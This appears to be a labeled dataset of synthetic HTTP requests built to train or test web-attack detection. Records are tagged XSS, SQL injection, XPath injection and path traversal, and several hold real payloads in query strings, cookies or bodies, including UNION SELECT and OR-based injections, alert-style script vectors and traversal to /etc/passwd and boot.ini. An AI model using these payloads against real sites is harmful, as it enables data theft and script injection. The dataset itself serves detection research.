GET /eFJ/diEwd9eplfo/tJ2Q/yfxo0uhWs7aG.cXq/36QyRfpsRYinWiRmm.htm?a3aHtbiwhest=eRgN&ARAe3eipcualJ=51467703&r0t=aeitp&zROYakTsock_streamxuNu=ednsaniWgdd&tsamT2pEYLzkIU=abIX&sokeu=hcals5ha+%5Csfr&ueasUwe=821192997&doceI6t=ojgv&ldxude=8770457367&certf9nbc6=811&1update8szUF=%27++++OR++++%2730l2ab%27+++BETWEEN+%27R%27+++++AND+++++%27T&zMNX=sdsevsLoidlcmyt&fe2yoiaIeoOaet=pvseirdunt&trnnoem=650&LiaAeojS9etloo=+h+var HTTP/1.1
Host: 173.212.139.136
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, deflate;q=0.4, gzip
Accept-Language: prsO-e;q=0.1, thw0-n9ha, e-ps, uEtnwonp-l3Ezsiqw;q=0.0, i6EkgeA-esrtItms
Cache-Control: no-cache
Client-ip: 247.223.116.97
Cookie: ne9oe=oFif0j
Cookie2: $Version="53"
Date: Fri, 29 Feb 08 09:16:57 UTC
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 04 Nov 09 01:51:40 GMT
If-Unmodified-Since: Sun, 23 May 04 08:17:57 UTC
If-Match: *
If-None-Match: *
If-Range: "kd9TaOn9Hi2WMX@XmAwq"
Max-Forwards: 5
MIME-Version: 1.4
Pragma: ehih2rqm='Vbe3Js'
Proxy-Authorization: eTi1ny Jxi3piru=smaxcs
Authorization: krfc hseft=nszeoobr
Range: -30216,36258-
Referer: http://9rpe.de/st80/etzAdac/aaoolu/taes/ohahs.avi
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 0.9; Lr-sI; rv:1.3.9) Gecko/17797955
UA-CPU: Sparc
UA-Disp: 3369,6494,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 2.5 160.198.150.9, s6sIhc/0.6 214.98.136.146
Transfer-Encoding: gzip
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35217
Start - Id: 47306
class: XSS
GET /bQz1QtvlaCImAvSI9NC/hq3huY/us7d/dscmcYaiEuns/iUfSfd0M8vD3G62L2/lxyMlinkaLPA.dll?eitoaiai=natelm&dkh7iuyoljueS=%3Cdiv+style+%3D+%22+binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.onorge.com%2Fscript%2Fue7t77i.cfm%5D%29%3B+%22+++%3E&eean5rrob=k-N_j4P4m&h9r=ozssllVphauDr&nnehde7oojlew=o60kpweQYb&b36oNEotrLqapeo=anch9&echophpQEidboot.iniap=7772048238&nhlnscaetogiml=not7mvs&eopjaosloAonod=4858&d2sthsxrS=onkH&nti4n=%5Brn&ecceoerituPh=daah3n73ln&6Ewn=468 HTTP/1.0
Host: www.tutEf3evip.cz
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.5, iso-8859-9, iso-8859-7
Accept-Encoding: 
Accept-Language: iyltSu3-e7o, anx-5o;q=0.4, eaeydi1-erIgE
Cache-Control: max-age=8681
Client-ip: 104.102.195.181
Cookie: rrirRhRd=4gtp+o
Cookie2: $Version="81"
Date: Sun, 17 May 09 18:53:22 GMT
ETag: W/"kmh.JRxb6nN3qMqK1"
Expect: Aaog
From: told@ol9na.de
If-Modified-Since: Fri, 19 Feb 10 21:43:02 GMT
If-Unmodified-Since: Sat, 23 May 09 21:42:32 UTC
If-Match: *
If-None-Match: "_xafT1FZA3sPDfocKFso"
If-Range: Tue, 02 Dec 08 22:15:20 CET
Max-Forwards: 6063
MIME-Version: 0.1
Pragma: ep5te=pe08
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: eljvaE dmsot=omnus5
Range: 498-
Referer: http://diasp0ob.gov/civeem2h/wnjrce/hewue.pdf
TE: deflate,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.8 (Windows; U; Windows NT 0.9; rs-pr; rv:5.9.8) Gecko/84139181
UA-CPU: Sparc
UA-Disp: 557,9358,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: 6.9 189.230.209.122, FTP/0.3 219.143.187.173:546, FTP/6.9 127.175.83.124
Transfer-Encoding: deflate
Upgrade: te4gye/2.3, elsad/9.1, hedM/8.6, a0ndP/0.7
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 1360027
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47306
Start - Id: 45424
class: PathTransversal
PUT /Ijweotanresaer4oF/drshegEIbtmedm.cgi? HTTP/1.0
Content-Length: 62
Content-Language: hHc
Content-Encoding: deflate
Content-Location: http://www.otGe8a.org/T6htc/oeeHil/72nnq/tpeca.rar
Content-MD5: b3RheTd0aWxycHF5YlFzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 May 04 09:48:32 UTC
Last-Modified: Tue, 15 Nov 05 23:14:13 UTC
Host: www.Fiaheh.com
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-greek, euc-kr;q=0.7
Accept-Encoding: gzip
Accept-Language: sefvsn-pui9bs;q=0.4, 7te-sKy, t7tSse-gelaia
Cache-Control: max-stale=005
Client-ip: 202.38.83.201
Cookie: 0wnl=hx9d;ao2b=9529913;ext=08tim@X_FHh9;saynhxbetEuors=rZ-08a;meca=evssolahed
Cookie2: $Version="494"
Date: Tue, 08 May 07 24:17:46 CET
ETag: W/"5H2jAbltXSgwgFG-W91"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Fri, 29 Jan 10 07:20:09 GMT
If-Unmodified-Since: Tue, 23 Mar 10 23:50:25 UTC
If-Match: "UEz5I0Gr9q@D7yhf"
If-None-Match: *
If-Range: "h43ZGVP1a-HOJYZ@eTYM"
Max-Forwards: 9800
MIME-Version: 1.4
Pragma: o1rsU=thle
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Basic amR6cnNrcjp0ZXJ0
Range: -292636,082693-
Referer: /6hnr1w/aeti/grnurzdn/tiqca.swf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 3.3; Eh-e2; rv:1.7.1) Gecko/53136507
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 357x895
Via: 8.5 www.m6dnesI.shtml:4938, 3.8 www.heu3kora.png, 9.3 www.euebVoe.png
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ia782t=a:\windows\boot.ini&byouohuDriot4o=nsrd nal(k0h

End - Id: 45424
Start - Id: 48944
class: XPathInjection
GET /erx0Da/lK_J9JY8rpD/Tpsam6var/sniHydGaedseoeszryfu/p9WosMx8d1hYIdhPg/eBLJ_/wS_DI15oseJWwjYZwk/nahoCN7err/muwii1h/mFAgiFPVQywqoyih6J/y1tsld.jpg?serhmtAgEr=766&oeyiyscxli=fM&Iitdr9z7=4ns&pty=1228530308&Tehahdivcpiadh=nodeAloe&eo8acshiHjr6=264468&TvarL.netcatDoEgroup byjKt=9&hmochabUstyle9DA8IEm=htservicesoutzoOlk%24o+xp_at&ndct=2t7p&na0qiiiseorks=prnesp%2Fe%2Feedahb%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D58%5D+or+++++%27ilbv%27+%3D+++%27&cbto=283745&xahnteem=aEp5CLJtuJ HTTP/1.1
Host: 104.102.132.132
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: H-n;q=0.9, dg-ybtown
Cache-Control: no-transform
Client-ip: 208.68.234.50
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Sun, 17 Jun 07 10:58:04 CET
ETag: "i8pw8MiXbYxDFs-"
Expect: eeyqig
From: 11ria@soa2e.be
If-Modified-Since: Thu, 17 Jan 08 15:59:18 UTC
If-Unmodified-Since: Mon, 07 Mar 05 10:26:11 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Aug 06 17:40:55 UTC
Max-Forwards: 0449
MIME-Version: 8.7
Pragma: he='a'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: NTLM OWFoNm51aXR0c3Q5Y25yOWlhdHJzbWlzZWhhc2VOaTBlcw==
Range: 326-470558,-0121
Referer: http://2Stfpbl.ch/0aYfncn/sneRen.png
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: 5HqFnk http://www.idet.uk
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 508x349
Via: 6.0 www.tOHslei.gif
Transfer-Encoding: identity
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 874 173.192.166.189 "RHrt5n" "Sun, 30 Mar 08 15:54:31 UTC"
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 0647223664061782
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48944
Start - Id: 46055
class: PathTransversal
GET /tcnten18vce3136eB/e563nn6z.gif?7leieyg0seNp=nIfsC7pm&tatTyHtf=i%3Bi&fsECaSf=esw3teoisibin9&purdSiitct=beemece&yuwS7letchrnrm=439&i1v=c1aGWWW&otmslo=8&yk5oanh=gd7Achild&SLbed=654710&adr2hscatirqrls=ta8aeedupdateoe%7Erl&Gd1uce=543625270&OLys3dzbqnonhAG=to4o4%27rr%3Ap&iem5hovhh=systemEoe%28h+Bsamurot HTTP/1.0
Host: www.usse.net
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr;q=0.1, cp-950;q=0.4, x-mac-chinesetrad
Accept-Encoding: gzip, compress, compress, compress;q=0.6, gzip
Accept-Language: iium-5ihtfm;q=0.5, jh-Ilthitu;q=0.5, err-e7e3et;q=0.6, tt-hw0miee;q=0.8
Cache-Control: min-fresh=4
Client-ip: 28.91.166.181
Cookie: nCvtv=/etc/passwd
Cookie2: $Version="426"
Date: Mon, 13 Jul 09 02:19:57 CET
ETag: "Fdns_PqkqCoKhIcKue"
Expect: 3t0ectj
From: pH95do@eieRrn3C.org
If-Modified-Since: Sat, 30 Jan 10 05:30:16 GMT
If-Unmodified-Since: Tue, 23 Aug 05 05:55:41 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Jun 06 16:35:41 UTC
Max-Forwards: 5
MIME-Version: 1.1
Pragma: etn='teoelbh'
Authorization: lran braN=bascTn
Referer: /u2kRiaEd.mspx
TE: deflate;q=0.4,chunked,trailers
Trailer: Via
User-Agent: itdh3tre (6zY2AC)
UA-CPU: 68000
UA-Disp: 478,2158,8
UA-OS: Solaris
UA-Color: color32
Via: 7.0 www.ogiNa.css:1
Transfer-Encoding: deflate
Upgrade: epAXs/9.0
Warning: 694 www.ftiedt.jpeg "r9el7ieioith" "Sun, 16 Oct 05 13:31:29 CET"
X-Forwarded-For: 161.12.232.56
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46055
Start - Id: 35266
class: SqlInjection
GET /nJD03pDqBiXf0w.jpg?liwtkndrAtjmnw=es&JDga6iem=069&0oao=a%40tpA&bLkun=vn9hwfcny6egDh&gos3rpen=ipliOxxa8sge&Euedisaso=a4rrc%3Cbgsound&9adMynaatt=rieoP&oyvcbieaelplb6n=%27+%29+UNION+++ALL++SELECT++++4098%2C4%2C4756%2C396%2C0361+++FROM++ru0i++WHERE++%28++++%27%27%3D%27&1in=%3Eintals&jqeOErslH1yO=11705979&5SjY=3478&rmresl7tS=enfhrcpetr&FLr5=9061669388&rh9=tolb HTTP/1.0
Host: www.e0d0njsm.cz
Connection: keep-alive
Accept: audio/basic;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=4
Client-ip: 109.198.163.157
Cookie: uVzC6mDx=886427023;airsi2ancHonn=1613183
Cookie2: $Version="06"
Date: Fri, 03 Oct 08 05:05:06 UTC
ETag: "bvEbhRuWJy1AnSCQb"
Expect: meahwq=liroah;ooftt
From: lpter@0feo.uk
If-Modified-Since: Wed, 13 Jan 10 14:17:18 UTC
If-Unmodified-Since: Tue, 29 Mar 05 22:05:15 GMT
If-Match: "49Y2aJQkLsrclT-vssYb"
If-None-Match: "1yrJVAEuoc6NI.AOn"
If-Range: "m9sFjx2KK14Y7kvz@wzX"
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: Stnre narm7va=xa1tc
Range: 930-456,2355-
Referer: http://5hhngtj.com/jtdlRae1/pe8es0/emes.exe
TE: trailers
Trailer: Referer
User-Agent: nOpymR6 http://www.eo2tqja.be
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/6.3 29.121.175.205, FTP/3.7 179.33.89.23:7032, HTTP/1.6 www.npepbhhs.js:138
Transfer-Encoding: compress
Upgrade: sJi/7.6, enhin/3.8, 4oba/9.2
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 086505531477
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35266
Start - Id: 46320
class: PathTransversal
GET /ed/c6PahtreoEh/t4dktgmhbsof8On.js?pesio23bi5np4md=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&L9jwag=oanBece%3Dgitmpbn&n0dnlqeccmlhueq=3e9otavtv1p&HvPP29M7blinkl3=erEeon5vpptlanaYe&srnieqoLi=rnUohsisondd&se6X8iau54=2870&rbnc6oa4e=mites&Xea3emhun=trho&pioaqmbosongig=eoeoH%7Es8ew%28i&c0aooaho=77&1ZGSz=082998&5Rca=4rm&RugnnqrytIcok0=64920141&ptzratitulur=464892732&e0teux1r=%2F%27atmpi HTTP/1.1
Host: www.dzsteaon.be
Connection: close
Accept: image/png, application/*, application/postscript
Accept-Charset: shift_jis;q=0.8, windows-1253;q=0.0
Accept-Encoding: 
Accept-Language: n-eHI, e7l-o, de-a, ooai-lpwmal;q=0.4, roEsj6-n;q=0.9
Cache-Control: no-transform
Client-ip: 79.110.171.13
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="67"
Date: Sat, 30 Jan 10 08:16:33 UTC
ETag: W/"1BKOAtAn71-i0xK.ka"
Expect: 100-continue
From: i4eo@detiLnij.be
If-Modified-Since: Fri, 16 Oct 09 18:45:29 CET
If-Unmodified-Since: Thu, 25 Jun 09 18:35:04 UTC
If-Match: "azJGIiqSel9iXHa@"
If-None-Match: "mI9f03cd5Sy3g3SZWs"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/hecitr/doeame/jelauc/aesajiHl/e5sikade.cfm
Authorization: NTLM eHNiZG5jdHJzeXZhTWR5cmh2c0djb25zQWVlaXR0ZWFyZGlFVXJweVJvZA==
Range: 595-7160,98-,4-961
Referer: /snwe40u/ahheusA5/eefan/n2iiDqs.msf
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: tDjKQNoq http://www.eofefe.fr
UA-CPU: Sparc
UA-Disp: 0145,4311,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: HTTP/5.6 www.rwdss.jpeg
Transfer-Encoding: identity
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 0373535580
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46320
Start - Id: 41492
class: SqlInjection
PUT /1zNA4JNeh1JIF1OYt0m/rOrhoseXtetsasNeaP/Tmstcoiae13e4l2fa/NQeb/oRnCBX2CVFbS1.n2y/lttiu0n8E/Ilrsapao57oaucAItHi.js? HTTP/1.0
Content-Length: 118
Content-Language: isudSu
Content-Encoding: identity
Content-Location: /ttsrEns/idhe/o0t7/itnapiub.html
Content-MD5: cnR0aTRhQXN6c2l6Y2F0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Dec 09 14:48:02 GMT
Last-Modified: Fri, 01 Dec 06 14:43:05 GMT
Host: www.terdkrb0m.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.6, koi8-r, euc-jp, koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 166.168.236.80
Cookie: ljqel2368koxtd=hveghEswnnd2agte;Flnm0ter0=60173;aiLMGAhttp=6mu
Cookie2: $Version="965"
Date: Tue, 17 Apr 07 08:32:32 UTC
ETag: W/"yb6XrfzwffC.Ke8rnPCg"
Expect: maEbbf
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Sat, 08 Mar 08 14:51:08 CET
If-Unmodified-Since: Wed, 30 Nov 05 24:34:15 CET
If-Match: "KSbB8s_2Gt2VQgycS"
If-None-Match: "M510Q-6cxIeb7POqq"
If-Range: *
Max-Forwards: 3
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: NTLM bXNzdWV5cHVKcjY3ZXRzOGhpNzNpbmtkbDdudUFyY1V0Y2plbDNPdHhhdmk=
Range: 78-403185
Referer: http://www.bfdn.be/mKeMe/ahkad/LoeIent.jpg
TE: trailers
Trailer: Accept-Encoding
User-Agent: p1Lt8s/6.2.2.9
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/1.8 www.d5tse.gif, FTP/4.2 www.umdstie.png:493, amtl/0.0 94.148.9.155:603
Transfer-Encoding: compress
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 131.117.242.175
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rsT0lasegxtnaea=l4nteibAZeq&PmailhJgbez=lbfVb&ocotw80sse=' AND USER_NAME()='anlyi&n3nobo6hmaganE=aadminrqel2

End - Id: 41492
Start - Id: 48287
class: XSS
PUT /eAU0vKywdFmpAD3cJ171/Mor/it/6TQJ5ZW9m9dXvSAI0P/io/p5Isismsrl/U32i.css? HTTP/1.0
Content-Length: 168
Content-Language: eskfuw
Content-Encoding: gzip
Content-Location: /7nids/eyzez/rhn5ser/elean.zip
Content-MD5: cjJvN251c3Q0c2VzYWVOdg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Sep 08 08:12:43 CET
Last-Modified: Sun, 30 Sep 07 20:11:26 GMT
Host: www.rdss.st
Connection: close
Accept: application/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8978
Client-ip: 145.84.197.68
Cookie: 9WVSauYsystemxtermSperl8=<img  src   = "  rorime   "onmouseover   = " [alert ('ji');]    "  >;qdeaanetwte3inh=ahr;s1feiaor=eftu5eU5r;tl=ivlennaRtirh
Cookie2: $Version="1"
Date: Sat, 26 Jan 08 13:32:36 CET
ETag: "MtTZ5vY5WHusiemJv"
If-Modified-Since: Wed, 12 Oct 05 19:13:24 GMT
If-Unmodified-Since: Tue, 30 Jan 07 06:22:21 UTC
If-Match: *
If-None-Match: *
If-Range: "0VL_V5gvupVFO1KI8TB"
Max-Forwards: 3604
MIME-Version: 3.3
Authorization: ndLoy oHanesEu=Anil
Referer: http://oniWmd.cz/eakwHel/61Oa6ieo/tensc/eiiSyAOO/swfh.cgi
TE: deflate;q=0.2,trailers
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 2.5; ht-nw; rv:9.7.4) Gecko/04005366
UA-Disp: 8989,2984,8
UA-OS: Windows NT
Via: cenivE/5.8 www.ntSn.gif, Nnu/6.5 www.hETtr.css:51293, 2.2 224.113.3.14
Transfer-Encoding: eoeian; mdden=ofAsfne5
Upgrade: uitmh/9.8, klde/1.2
X-Serial-Number: 036132997114455
----: -----------------------

5Sjestind9sO=4069&ly3py=87174&it=btt&uxoiw9hngml90=649228&tWsxz=5818&Gg5iframeKG=ti1s~7 &eNsnrte=poAeFOHqaM1c&otjl=7264017&nne1mzekiec=640967080&eudb=54686&new=541024

End - Id: 48287
Start - Id: 35226
class: SqlInjection
GET /HEedao/tB.8-yuYl/%ulb3.6turFQ5/a_13DgMXUZB/tecZIe/i.Hbd.Z5/IX/vfu7af/i76n9ltihob/YtRktBh0x.php?BYUod=8x&05G_X98NZYv=741250&aocmtet5h2r1sg=awinntlw&Faeu7ceeounhuwn=sloaasemeb&xoai=%27+++++OR++++%27csetwon%27++++%3D+%27+&ofSIrbu=tT3Ftnaectsrfdnt&sehmt5q=ietNhomemfueltR+to HTTP/1.1
Host: 30.246.30.168
Connection: mittP
Accept: application/rtf;q=0.0, audio/*;q=0.0
Accept-Charset: x-mac-greek;q=0.6, x-mac-arabic;q=0.7, iso-2022-kr
Accept-Encoding: deflate, compress;q=0.9, identity;q=0.2, deflate;q=0.3
Accept-Language: *;q=0.9
Cache-Control: max-age=75
Client-ip: 1.129.63.171
Cookie: gbafnAbposae=a;openntl inl
Cookie2: $Version="12"
Date: Sat, 08 Jul 06 01:15:27 GMT
ETag: "NfOfdyVU6e@4HME"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 17 Jun 09 19:20:54 CET
If-Unmodified-Since: Mon, 15 Sep 08 20:33:26 CET
If-Match: "aoKEF5FZ3@G5fWB-"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: alkiR qetet=eoDage
Authorization: Basic MWdNbmVuaWI6aHRpb2U=
Range: -2,109-7
Referer: /ocaso.dll
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: ndle6 (lZF_tx; fOL-uRhS; pEYk70e-)
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 3.2 www.fEndAno.css, HTTP/9.0 221.44.80.95
Transfer-Encoding: deflate
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 735496334921593
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35226
Start - Id: 47867
class: XSS
GET /retu7r/pnoeceoh/etrfoabhove/R3qrLQfySIV/odeaetscLhsoatewn2/nfGKLEQZdUAyfb3oUgzi/iJT/n@dPePaAxZhZAFpf1q9N/kH@iQ4y67SI0/sxrnhclto/itnCtOichCtjrelsl.gif?ZO@IWAjeADAD=6n&histnhnioeaacqt=f79iWvww33&nktgjceaakttl=%3Cbody+++onload++%3D++%22++++%5Balert++%28%27tohDs%27%29%3B%5D++%22%3E&eu4fteeiodieak=aLksessle&Ahabhjedgeersa1=nD HTTP/1.1
Host: www.6c6eiyg.be
Connection: keep-alive
Accept: image/jpeg;q=0.1, audio/x-wav;q=0.6, audio/*;q=0.8
Accept-Charset: cp-932;q=0.0, iso-8859-9;q=0.5, koi8;q=0.2, iso-8859-15;q=0.7, x-mac-japanese
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 5.197.242.191
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="8"
Date: Sat, 05 Nov 05 08:08:33 CET
ETag: "jyvTDLdVK3kRRBHcIa"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: wu4c60i@McindieetT.fr
If-Modified-Since: Wed, 13 Aug 08 08:01:55 GMT
If-Unmodified-Since: Fri, 08 Jun 07 08:21:19 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Dec 04 18:40:40 GMT
Max-Forwards: 1
MIME-Version: 9.4
Pragma: oiieaxf=3ndp3
Proxy-Authorization: 94wiw ilu2a=emsx
Authorization: Basic ZW9hZU5zcDpzYmFpZXc=
Range: 541-3,060-23987,670-3
Referer: /titoeTt/dhoeu/awdy6.mpg
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: Mozilla/3.3 (compatible; Konqueror/6.5; Win 9x; nate; 9asL; oesj)
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: 2.0 138.209.196.173:24563, sTrb/6.3 www.8xc5U.htm
Transfer-Encoding: deflate
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 546 www.taehteaa.gif "qmeXpetfcrEeeEci" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47867
Start - Id: 47411
class: XSS
GET /s-..k8JLhfTNypDYI/xswuenuent2ntisieens/aLDe3D3YG2S2F@sKTmSh/pLttw/eeuhtrifIy/ngigabiihna.asp?otn=%3Cform%2Bname%3Deht++%3E%3Cselect%2Bname%3DFae++%3Ehttp%3A%2F%2Fwww.s.com%2FikiTde%2F%3F%3C%2Fselect+%3E%3C%2Fform++++%3E&h9dttoaas4=5E&ZgieSsam=422471&wdb=6 HTTP/1.1
Host: 103.9.68.123
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, identity, identity;q=0.1, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 71.102.4.108
Cookie: aesqieasetioEl=Tdselestoudtfa3eeO;oklDr6umitltbku=irBtlvIx
Cookie2: $Version="78"
Date: Mon, 13 Feb 06 01:33:48 GMT
ETag: "DEh1qX9bUYN6ClxWCRw"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Sun, 08 May 05 02:59:54 UTC
If-Unmodified-Since: Tue, 07 Jul 09 12:56:47 CET
If-Match: "xhQzR2BhwiJbOHCY"
If-None-Match: "DWaCN5fv8wwLn_7mv1H"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: nuoe nldti=eta2nt
Authorization: NTLM VDdTY2VlZWJvbm5zaXlvcjdudHNjZnFOa2RzYWNsQUVhaGFpZTly
Range: 2506-,-467
Referer: /gesmm/now3ayda/d7hhtswa.bin
TE: chunked,deflate
Trailer: If-Range
User-Agent: rtntlt
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: FTP/4.5 14.95.43.253
Transfer-Encoding: deflate
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 067686
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47411
Start - Id: 39255
class: SSI
